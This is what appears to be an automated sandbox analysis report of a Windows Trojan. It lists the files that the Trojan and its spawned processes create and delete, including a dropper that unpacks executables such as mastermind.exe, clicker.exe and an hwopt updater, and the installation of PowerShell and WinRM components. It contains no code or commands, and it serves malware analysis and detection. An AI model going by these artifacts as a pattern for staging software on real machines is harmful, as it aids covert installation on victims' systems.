C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (3351 bytes)
C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\eula.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.vbs (2727 bytes)
C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe (7339 bytes)
C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (168 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\winrshost.exe (22 bytes)
C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (76 bytes)
C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (603 bytes)
C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (37 bytes)
C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (453 bytes)
C:\f1fab1e3e4f7fec893e8\about_history.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (3009 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (824 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\f1fab1e3e4f7fec893e8\about_for.help.txt (146 bytes)
The Trojan deletes the following file(s):
C:\f1fab1e3e4f7fec893e8\update\update.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (0 bytes)
C:\f1fab1e3e4f7fec893e8 (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (0 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (0 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_for.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (0 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (0 bytes)
C:\_571265_ (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_join.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (0 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\update\eula.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.vbs (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\winrshost.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_history.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (0 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (0 bytes)
The process master.exe:1488 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (0 bytes)
The process hwopt12052016001648_updater_service.exe:380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\4p64sgqi.cmdline (358 bytes)
%System%\config\system (3811 bytes)
%WinDir%\Temp\4p64sgqi.out (441 bytes)
%WinDir%\Temp\4p64sgqi.0.cs (676 bytes)
%System%\config (200 bytes)
%System%\config\SYSTEM.LOG (5497 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\4p64sgqi.cmdline (0 bytes)
%WinDir%\Temp\4p64sgqi.dll (0 bytes)
%WinDir%\Temp\4p64sgqi.out (0 bytes)
%WinDir%\Temp\4p64sgqi.0.cs (0 bytes)
%WinDir%\Temp\4p64sgqi.tmp (0 bytes)
%WinDir%\Temp\4p64sgqi.err (0 bytes)
The process mscorsvw.exe:3756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp (0 bytes)
The process mscorsvw.exe:2196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp (0 bytes)
The process mscorsvw.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp (0 bytes)
The process mscorsvw.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)
The process mscorsvw.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp (0 bytes)
The process mscorsvw.exe:3180 makes changes in the file system.
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP105.tmp (0 bytes)
The process mscorsvw.exe:2680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp (0 bytes)
The process mscorsvw.exe:3832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)
The process mscorsvw.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp (0 bytes)
The process mscorsvw.exe:1556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)
The process mscorsvw.exe:2536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)
The process mscorsvw.exe:2000 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (81233 bytes)
The process mscorsvw.exe:2064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp (0 bytes)
The process %original file name%.exe:1328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (47508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (5869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (166653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (44026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (31448 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (0 bytes)
The process update.exe:3572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\WindowsPowerShell\v1.0\SETE2.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (7 bytes)
%System%\SET3A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (49 bytes)
%System%\winrm\0409\SET52.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (1281 bytes)
%WinDir%\Help\SETE0.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETE8.tmp (16 bytes)
%WinDir%\SECF3.tmp (1897 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (601 bytes)
%System%\SET44.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (5 bytes)
%System%\GroupPolicy\Adm\SET4F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (5 bytes)
%WinDir%\inf\SET34.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (6 bytes)
%System%\wbem\SET1F.tmp (4 bytes)
%System%\SET49.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (2 bytes)
%System%\SET25.tmp (7433 bytes)
%System%\SET20.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETE4.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETC1.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETD6.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (5 bytes)
%System%\SET2A.tmp (1281 bytes)
%WinDir%\inf\oem10.PNF (12902 bytes)
%System%\WindowsPowerShell\v1.0\SETE6.tmp (40 bytes)
%System%\SET2D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (18 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETE7.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (7 bytes)
%System%\SET22.tmp (35 bytes)
%System%\SET3D.tmp (1281 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (20 bytes)
%System%\SET29.tmp (22 bytes)
